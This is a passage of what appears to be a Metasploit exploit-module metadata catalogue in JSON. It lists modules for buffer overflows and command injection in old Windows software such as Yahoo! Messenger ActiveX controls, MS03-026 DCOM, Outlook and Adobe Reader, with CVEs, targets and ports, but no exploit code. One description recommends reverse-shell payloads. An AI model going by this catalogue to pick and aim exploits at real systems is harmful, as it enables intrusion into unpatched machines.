"autofilter_services": [
],
"targets": [
"Automatic",
"Windows Universal",
"Debug Target (Crash)"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/browser/wmi_admintools.rb",
"is_install_path": true,
"ref_name": "windows/browser/wmi_admintools",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/x360_video_player_set_text_bof": {
"name": "X360 VideoPlayer ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/x360_video_player_set_text_bof",
"rank": 300,
"disclosure_date": "2015-01-30",
"type": "exploit",
"author": [
"Rh0",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with the\n X360 Software. By setting an overly long value to 'ConvertFile()', an attacker can overrun\n a .data buffer to bypass ASLR/DEP and finally execute arbitrary code.",
"references": [
"EDB-35948",
"URL-https://rh0dev.github.io/blog/2015/fun-with-info-leaks/"
],
"platform": "Windows",
"arch": "x86",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb",
"is_install_path": true,
"ref_name": "windows/browser/x360_video_player_set_text_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/xmplay_asx": {
"name": "XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow",
"full_name": "exploit/windows/browser/xmplay_asx",
"rank": 400,
"disclosure_date": "2006-11-21",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in XMPlay 3.3.0.4.\n The vulnerability is caused due to a boundary error within\n the parsing of playlists containing an overly long file name.\n This module uses the ASX file format.",
"references": [
"CVE-2006-6063",
"OSVDB-30537",
"BID-21206",
"URL-http://secunia.com/advisories/22999/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Pro English SP4",
"Windows XP Pro SP2 English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/xmplay_asx.rb",
"is_install_path": true,
"ref_name": "windows/browser/xmplay_asx",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/yahoomessenger_fvcom": {
"name": "Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/yahoomessenger_fvcom",
"rank": 300,
"disclosure_date": "2007-08-30",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the Yahoo! Messenger ActiveX\n Control (YVerInfo.dll <= 2006.8.24.1). By sending an overly long string\n to the \"fvCom()\" method from a yahoo.com domain, an attacker may be able\n to execute arbitrary code.",
"references": [
"CVE-2007-4515",
"OSVDB-37739",
"BID-25494",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP2 Pro English"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/browser/yahoomessenger_fvcom.rb",
"is_install_path": true,
"ref_name": "windows/browser/yahoomessenger_fvcom",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/yahoomessenger_server": {
"name": "Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/browser/yahoomessenger_server",
"rank": 400,
"disclosure_date": "2007-06-05",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX\n Control (ywcupl.dll) provided by Yahoo! Messenger version 8.1.0.249.\n By sending an overly long string to the \"Server()\" method, and then calling\n the \"Send()\" method, an attacker may be able to execute arbitrary code.\n Using the payloads \"windows/shell_bind_tcp\" and \"windows/shell_reverse_tcp\"\n yields the best results.",
"references": [
"CVE-2007-3147",
"OSVDB-37082"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0/SP1 Pro English",
"Windows 2000 Pro English All"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/browser/yahoomessenger_server.rb",
"is_install_path": true,
"ref_name": "windows/browser/yahoomessenger_server",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/zenturiprogramchecker_unsafe": {
"name": "Zenturi ProgramChecker ActiveX Control Arbitrary File Download",
"full_name": "exploit/windows/browser/zenturiprogramchecker_unsafe",
"rank": 600,
"disclosure_date": "2007-05-29",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module allows remote attackers to place arbitrary files on a user's file system\n via the Zenturi ProgramChecker sasatl.dll (1.5.0.531) ActiveX Control.",
"references": [
"CVE-2007-2987",
"OSVDB-36715",
"BID-24217"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb",
"is_install_path": true,
"ref_name": "windows/browser/zenturiprogramchecker_unsafe",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/browser/zenworks_helplauncher_exec": {
"name": "AdminStudio LaunchHelp.dll ActiveX Arbitrary Code Execution",
"full_name": "exploit/windows/browser/zenworks_helplauncher_exec",
"rank": 300,
"disclosure_date": "2011-10-19",
"type": "exploit",
"author": [
"rgod",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in AdminStudio LaunchHelp.dll ActiveX control. The\n LaunchProcess function found in LaunchHelp.HelpLauncher.1 allows remote attackers to run\n arbitrary commands on the victim machine. This module has been successfully tested with the\n ActiveX installed with AdminStudio 9.5, which also comes with Novell ZENworks Configuration\n Management 10 SP2, on IE 6 and IE 8 over Windows XP SP 3.",
"references": [
"CVE-2011-2657",
"OSVDB-76700",
"BID-50274",
"ZDI-11-318",
"URL-http://www.novell.com/support/viewContent.do?externalId=7009570&sliceId=1"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-10-05 16:44:36 +0000",
"path": "/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb",
"is_install_path": true,
"ref_name": "windows/browser/zenworks_helplauncher_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/dcerpc/ms03_026_dcom": {
"name": "MS03-026 Microsoft RPC DCOM Interface Overflow",
"full_name": "exploit/windows/dcerpc/ms03_026_dcom",
"rank": 500,
"disclosure_date": "2003-07-16",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"spoonm <spoonm@no$email.com>",
"cazz <bmc@shmoo.com>"
],
"description": "This module exploits a stack buffer overflow in the RPCSS service, this vulnerability\n was originally found by the Last Stage of Delirium research group and has been\n widely exploited ever since. This module can exploit the English versions of\n Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)",
"references": [
"CVE-2003-0352",
"OSVDB-2100",
"MSB-MS03-026",
"BID-8205"
],
"platform": "Windows",
"arch": "",
"rport": 135,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows NT SP3-6a/2000/XP/2003 Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/dcerpc/ms03_026_dcom.rb",
"is_install_path": true,
"ref_name": "windows/dcerpc/ms03_026_dcom",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/dcerpc/ms05_017_msmq": {
"name": "MS05-017 Microsoft Message Queueing Service Path Overflow",
"full_name": "exploit/windows/dcerpc/ms05_017_msmq",
"rank": 400,
"disclosure_date": "2005-04-12",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the RPC interface\n to the Microsoft Message Queueing service. The offset to the\n return address changes based on the length of the system\n hostname, so this must be provided via the 'HNAME' option.\n Much thanks to snort.org and Jean-Baptiste Marchand's\n excellent MSRPC website.",
"references": [
"CVE-2005-0059",
"OSVDB-15458",
"MSB-MS05-017",
"BID-13112"
],
"platform": "Windows",
"arch": "",
"rport": 2103,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 ALL / Windows XP SP0-SP1 (English)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/dcerpc/ms05_017_msmq.rb",
"is_install_path": true,
"ref_name": "windows/dcerpc/ms05_017_msmq",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/dcerpc/ms07_029_msdns_zonename": {
"name": "MS07-029 Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)",
"full_name": "exploit/windows/dcerpc/ms07_029_msdns_zonename",
"rank": 500,
"disclosure_date": "2007-04-12",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"Unknown"
],
"description": "This module exploits a stack buffer overflow in the RPC interface\n of the Microsoft DNS service. The vulnerability is triggered\n when a long zone name parameter is supplied that contains\n escaped octal strings. This module is capable of bypassing NX/DEP\n protection on Windows 2003 SP1/SP2.",
"references": [
"CVE-2007-1748",
"OSVDB-34100",
"MSB-MS07-029",
"URL-http://www.microsoft.com/technet/security/advisory/935964.mspx"
],
"platform": "Windows",
"arch": "",
"rport": 0,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic (2000 SP0-SP4, 2003 SP0, 2003 SP1-SP2)",
"Windows 2000 Server SP0-SP4+ English",
"Windows 2000 Server SP0-SP4+ Italian",
"Windows 2000 Server SP0-SP4+ French",
"Windows 2003 Server SP0 English",
"Windows 2003 Server SP0 French",
"Windows 2003 Server SP1-SP2 English",
"Windows 2003 Server SP1-SP2 French",
"Windows 2003 Server SP1-SP2 Spanish",
"Windows 2003 Server SP1-SP2 Italian",
"Windows 2003 Server SP1-SP2 German"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/dcerpc/ms07_029_msdns_zonename.rb",
"is_install_path": true,
"ref_name": "windows/dcerpc/ms07_029_msdns_zonename",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/dcerpc/ms07_065_msmq": {
"name": "MS07-065 Microsoft Message Queueing Service DNS Name Path Overflow",
"full_name": "exploit/windows/dcerpc/ms07_065_msmq",
"rank": 400,
"disclosure_date": "2007-12-11",
"type": "exploit",
"author": [
"hdm <x@hdm.io>"
],
"description": "This module exploits a stack buffer overflow in the RPC interface\n to the Microsoft Message Queueing service. This exploit requires\n the target system to have been configured with a DNS name and\n for that name to be supplied in the 'DNAME' option. This name does\n not need to be served by a valid DNS server, only configured on\n the target machine.",
"references": [
"CVE-2007-3039",
"OSVDB-39123",
"MSB-MS07-065"
],
"platform": "Windows",
"arch": "",
"rport": 2103,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows 2000 Server English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/dcerpc/ms07_065_msmq.rb",
"is_install_path": true,
"ref_name": "windows/dcerpc/ms07_065_msmq",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/email/ms07_017_ani_loadimage_chunksize": {
"name": "Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)",
"full_name": "exploit/windows/email/ms07_017_ani_loadimage_chunksize",
"rank": 500,
"disclosure_date": "2007-03-28",
"type": "exploit",
"author": [
"hdm <x@hdm.io>",
"skape <mmiller@hick.org>"
],
"description": "This module exploits a buffer overflow vulnerability in the\n LoadAniIcon() function of USER32.dll. The flaw is triggered\n through Outlook Express by using the CURSOR style sheet\n directive to load a malicious .ANI file.\n\n This vulnerability was discovered by Alexander Sotirov of Determina\n and was rediscovered, in the wild, by McAfee.",
"references": [
"MSB-MS07-017",
"CVE-2007-0038",
"CVE-2007-1765",
"OSVDB-33629",
"BID-23194",
"URL-http://www.microsoft.com/technet/security/advisory/935423.mspx"
],
"platform": "Windows",
"arch": "",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": [
"Automatic",
"Windows XP SP2 user32.dll 5.1.2600.2622",
"Windows XP SP2 userenv.dll English",
"Windows XP SP2 userenv.dll French",
"Windows XP SP0/SP1 netui2.dll English",
"Windows 2000 SP0-SP4 netui2.dll English",
"Windows Vista user32.dll 6.0.6000.16386",
"Windows XP SP2 user32.dll (5.1.2600.2180) Multi Language",
"Windows XP SP2 user32.dll (5.1.2600.2180) English",
"Windows XP SP2 userenv.dll Portuguese (Brazil)",
"Windows XP SP1a userenv.dll English",
"Windows XP SP1a shell32.dll English"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/email/ms07_017_ani_loadimage_chunksize.rb",
"is_install_path": true,
"ref_name": "windows/email/ms07_017_ani_loadimage_chunksize",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/email/ms10_045_outlook_ref_only": {
"name": "Outlook ATTACH_BY_REF_ONLY File Execution",
"full_name": "exploit/windows/email/ms10_045_outlook_ref_only",
"rank": 600,
"disclosure_date": "2010-06-01",
"type": "exploit",
"author": [
"Yorick Koster <yorick@akitasecurity.nl>"
],
"description": "It has been discovered that certain e-mail messages cause Outlook to create Windows\n shortcut-like attachments or messages within Outlook. Through specially crafted TNEF\n streams with certain MAPI attachment properties, it is possible to set a path name\n to files to be executed. When a user double-clicks on such an attachment or message,\n Outlook will proceed to execute the file that is set by the path name value. These\n files can be local files, but also files stored remotely (on a file share, for example)\n can be used. Exploitation is limited by the fact that it is not possible for attackers\n to supply command line options.",
"references": [
"MSB-MS10-045",
"CVE-2010-0266",
"OSVDB-66296",
"BID-41446",
"URL-http://www.akitasecurity.nl/advisory.php?id=AK20091001"
],
"platform": "Windows",
"arch": "",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-22 18:49:09 +0000",
"path": "/modules/exploits/windows/email/ms10_045_outlook_ref_only.rb",
"is_install_path": true,
"ref_name": "windows/email/ms10_045_outlook_ref_only",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/email/ms10_045_outlook_ref_resolve": {
"name": "Outlook ATTACH_BY_REF_RESOLVE File Execution",
"full_name": "exploit/windows/email/ms10_045_outlook_ref_resolve",
"rank": 600,
"disclosure_date": "2010-06-01",
"type": "exploit",
"author": [
"Yorick Koster <yorick@akitasecurity.nl>"
],
"description": "It has been discovered that certain e-mail messages cause Outlook to create Windows\n shortcut-like attachments or messages within Outlook. Through specially crafted TNEF\n streams with certain MAPI attachment properties, it is possible to set a path name\n to files to be executed. When a user double-clicks on such an attachment or message,\n Outlook will proceed to execute the file that is set by the path name value. These\n files can be local files, but also files stored remotely (for example, on a file share).\n Exploitation is limited by the fact that it is not possible for attackers to supply\n command line options.",
"references": [
"MSB-MS10-045",
"CVE-2010-0266",
"OSVDB-66296",
"BID-41446",
"URL-http://www.akitasecurity.nl/advisory.php?id=AK20091001"
],
"platform": "Windows",
"arch": "",
"rport": 25,
"autofilter_ports": [
25,
465,
587,
2525,
25025,
25000
],
"autofilter_services": [
"smtp",
"smtps"
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/email/ms10_045_outlook_ref_resolve.rb",
"is_install_path": true,
"ref_name": "windows/email/ms10_045_outlook_ref_resolve",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/emc/alphastor_agent": {
"name": "EMC AlphaStor Agent Buffer Overflow",
"full_name": "exploit/windows/emc/alphastor_agent",
"rank": 500,
"disclosure_date": "2008-05-27",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in EMC AlphaStor 3.1.\n By sending a specially crafted message, an attacker may\n be able to execute arbitrary code.",
"references": [
"CVE-2008-2158",
"OSVDB-45714",
"URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=702"
],
"platform": "Windows",
"arch": "",
"rport": 41025,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"EMC AlphaStor 3.1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/emc/alphastor_agent.rb",
"is_install_path": true,
"ref_name": "windows/emc/alphastor_agent",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/emc/alphastor_device_manager_exec": {
"name": "EMC AlphaStor Device Manager Opcode 0x75 Command Injection",
"full_name": "exploit/windows/emc/alphastor_device_manager_exec",
"rank": 600,
"disclosure_date": "2013-01-18",
"type": "exploit",
"author": [
"Anyway <Aniway.Anyway@gmail.com>",
"Preston Thornburn <prestonthornburg@gmail.com>",
"Mohsan Farid <faridms@gmail.com>",
"Brent Morris <inkrypto@gmail.com>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a flaw within the Device Manager (rrobtd.exe). When parsing the 0x75\n command, the process does not properly filter user supplied input allowing for arbitrary\n command injection. This module has been tested successfully on EMC AlphaStor 4.0 build 116\n with Windows 2003 SP2 and Windows 2008 R2.",
"references": [
"CVE-2013-0928",
"ZDI-13-033"
],
"platform": "Windows",
"arch": "x86",
"rport": 3000,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"EMC AlphaStor 4.0 < build 800 / Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/emc/alphastor_device_manager_exec.rb",
"is_install_path": true,
"ref_name": "windows/emc/alphastor_device_manager_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/emc/networker_format_string": {
"name": "EMC Networker Format String",
"full_name": "exploit/windows/emc/networker_format_string",
"rank": 300,
"disclosure_date": "2012-08-29",
"type": "exploit",
"author": [
"Aaron Portnoy",
"Luigi Auriemma <aluigi@autistici.org>",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a format string vulnerability in the lg_sprintf function\n as implemented in liblocal.dll on EMC Networker products. This module exploits the\n vulnerability by using a specially crafted RPC call to the program number 0x5F3DD,\n version 0x02, and procedure 0x06. This module has been tested successfully on EMC\n Networker 7.6 SP3 on Windows XP SP3 and Windows 2003 SP2 (DEP bypass).",
"references": [
"CVE-2012-2288",
"OSVDB-85116",
"BID-55330",
"URL-http://aluigi.altervista.org/misc/aluigi0216_story.txt"
],
"platform": "Windows",
"arch": "",
"rport": 111,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"EMC Networker 7.6 SP3 / Windows Universal",
"EMC Networker 7.6 SP3 / Windows XP SP3",
"EMC Networker 7.6 SP3 / Windows 2003 SP2"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/emc/networker_format_string.rb",
"is_install_path": true,
"ref_name": "windows/emc/networker_format_string",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/emc/replication_manager_exec": {
"name": "EMC Replication Manager Command Execution",
"full_name": "exploit/windows/emc/replication_manager_exec",
"rank": 500,
"disclosure_date": "2011-02-07",
"type": "exploit",
"author": [
"Unknown",
"Davy Douhine"
],
"description": "This module exploits a remote command-injection vulnerability in EMC Replication Manager\n client (irccd.exe). By sending a specially crafted message invoking the RunProgram function, an\n attacker may be able to execute arbitrary commands with SYSTEM privileges. Affected\n products are EMC Replication Manager < 5.3. This module has been successfully tested\n against EMC Replication Manager 5.2.1 on XP/W2003. EMC Networker Module for Microsoft\n Applications 2.1 and 2.2 may be vulnerable too, although this module has not been tested\n against these products.",
"references": [
"CVE-2011-0647",
"OSVDB-70853",
"BID-46235",
"URL-http://www.securityfocus.com/archive/1/516260",
"ZDI-11-061"
],
"platform": "Windows",
"arch": "x86",
"rport": 6542,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"EMC Replication Manager 5.2.1 / Windows Native Payload"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/emc/replication_manager_exec.rb",
"is_install_path": true,
"ref_name": "windows/emc/replication_manager_exec",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/a_pdf_wav_to_mp3": {
"name": "A-PDF WAV to MP3 v1.0.0 Buffer Overflow",
"full_name": "exploit/windows/fileformat/a_pdf_wav_to_mp3",
"rank": 300,
"disclosure_date": "2010-08-17",
"type": "exploit",
"author": [
"d4rk-h4ck3r",
"Dr_IDE",
"dookie"
],
"description": "This module exploits a buffer overflow in A-PDF WAV to MP3 v1.0.0. When\n the application is used to import a specially crafted m3u file, a buffer overflow occurs\n allowing arbitrary code execution.",
"references": [
"OSVDB-67241",
"EDB-14676",
"EDB-14681"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/a_pdf_wav_to_mp3.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/a_pdf_wav_to_mp3",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/abbs_amp_lst": {
"name": "ABBS Audio Media Player .LST Buffer Overflow",
"full_name": "exploit/windows/fileformat/abbs_amp_lst",
"rank": 300,
"disclosure_date": "2013-06-30",
"type": "exploit",
"author": [
"Julian Ahrens",
"modpr0be <modpr0be@spentera.com>"
],
"description": "This module exploits a buffer overflow in ABBS Audio Media Player. The vulnerability\n occurs when adding a specially crafted .lst file, allowing arbitrary code execution with the privileges\n of the user running the application. This module has been tested successfully on\n ABBS Audio Media Player 3.1 over Windows XP SP3 and Windows 7 SP1.",
"references": [
"OSVDB-75096",
"EDB-25204"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"ABBS Audio Media Player 3.1 / Windows XP SP3 / Windows 7 SP1"
],
"mod_time": "2017-09-13 22:03:34 +0000",
"path": "/modules/exploits/windows/fileformat/abbs_amp_lst.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/abbs_amp_lst",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/acdsee_fotoslate_string": {
"name": "ACDSee FotoSlate PLP File id Parameter Overflow",
"full_name": "exploit/windows/fileformat/acdsee_fotoslate_string",
"rank": 400,
"disclosure_date": "2011-09-12",
"type": "exploit",
"author": [
"Parvez Anwar",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via\n a specially crafted id parameter in a String element. When viewing a malicious\n PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a\n buffer and execute arbitrary code. This exploit has been tested on systems such as\n Windows XP SP3, Windows Vista, and Windows 7.",
"references": [
"CVE-2011-2595",
"OSVDB-75425",
"BID-49558"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"ACDSee FotoSlate 4.0 Build 146"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/acdsee_fotoslate_string.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/acdsee_fotoslate_string",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/acdsee_xpm": {
"name": "ACDSee XPM File Section Buffer Overflow",
"full_name": "exploit/windows/fileformat/acdsee_xpm",
"rank": 400,
"disclosure_date": "2007-11-23",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a buffer overflow in ACDSee 9.0.\n When viewing a malicious XPM file with the ACDSee product,\n a remote attacker could overflow a buffer and execute\n arbitrary code.",
"references": [
"CVE-2007-2193",
"OSVDB-35236",
"BID-23620"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"ACDSee 9.0 (Build 1008)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/acdsee_xpm.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/acdsee_xpm",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/actfax_import_users_bof": {
"name": "ActiveFax (ActFax) 4.3 Client Importer Buffer Overflow",
"full_name": "exploit/windows/fileformat/actfax_import_users_bof",
"rank": 300,
"disclosure_date": "2012-08-28",
"type": "exploit",
"author": [
"Craig Freyman",
"Brandon Perry",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a vulnerability in ActiveFax Server. The vulnerability is\n a stack based buffer overflow in the \"Import Users from File\" function, due to the\n insecure usage of strcpy while parsing the csv formatted file. The module creates a\n .exp file that must be imported with ActiveFax Server. It must be imported with the\n default character set 'ECMA-94 / Latin 1 (ISO 8859)'. The module has been tested\n successfully on ActFax Server 4.32 over Windows XP SP3 and Windows 7 SP1. In the\n Windows XP case, when ActFax runs as a service, it will execute as SYSTEM.",
"references": [
"OSVDB-85175",
"EDB-20915",
"URL-http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"ActFax 4.32 / Windows XP SP3 EN / Windows 7 SP1"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/actfax_import_users_bof.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/actfax_import_users_bof",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/activepdf_webgrabber": {
"name": "activePDF WebGrabber ActiveX Control Buffer Overflow",
"full_name": "exploit/windows/fileformat/activepdf_webgrabber",
"rank": 100,
"disclosure_date": "2008-08-26",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>"
],
"description": "This module exploits a stack buffer overflow in activePDF WebGrabber 3.8. When\n sending an overly long string to the GetStatus() method of APWebGrb.ocx (3.8.2.0)\n an attacker may be able to execute arbitrary code. This control is not marked safe\n for scripting, so choose your attack vector accordingly.",
"references": [
"OSVDB-64579",
"URL-http://www.activepdf.com/products/serverproducts/webgrabber/"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/activepdf_webgrabber.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/activepdf_webgrabber",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_collectemailinfo": {
"name": "Adobe Collab.collectEmailInfo() Buffer Overflow",
"full_name": "exploit/windows/fileformat/adobe_collectemailinfo",
"rank": 400,
"disclosure_date": "2008-02-08",
"type": "exploit",
"author": [
"MC <mc@metasploit.com>",
"Didier Stevens <didier.stevens@gmail.com>"
],
"description": "This module exploits a buffer overflow in Adobe Reader and Adobe Acrobat Professional 8.1.1.\n By creating a specially crafted pdf that contains a malformed Collab.collectEmailInfo() call,\n an attacker may be able to execute arbitrary code.",
"references": [
"CVE-2007-5659",
"OSVDB-41495"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Adobe Reader v8.1.1 (Windows XP SP0-SP3 English)"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_collectemailinfo.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_collectemailinfo",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_cooltype_sing": {
"name": "Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow",
"full_name": "exploit/windows/fileformat/adobe_cooltype_sing",
"rank": 500,
"disclosure_date": "2010-09-07",
"type": "exploit",
"author": [
"Unknown",
"sn0wfl0w",
"jduck <jduck@metasploit.com>"
],
"description": "This module exploits a vulnerability in the Smart INdependent Glyphlets (SING) table\n handling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior versions are\n assumed to be vulnerable as well.",
"references": [
"CVE-2010-2883",
"OSVDB-67849",
"URL-http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html",
"URL-http://www.adobe.com/support/security/advisories/apsa10-02.html"
],
"platform": "Windows",
"arch": "",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/windows/fileformat/adobe_cooltype_sing.rb",
"is_install_path": true,
"ref_name": "windows/fileformat/adobe_cooltype_sing",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_windows/fileformat/adobe_flashplayer_button": {
"name": "Adobe Flash Player \"Button\" Remote Code Execution",
"full_name": "exploit/windows/fileformat/adobe_flashplayer_button",
"rank": 300,
"disclosure_date": "2010-10-28",
"type": "exploit",
"author": [
"Unknown",
"Haifei Li",
"jduck <jduck@metasploit.com>"
],
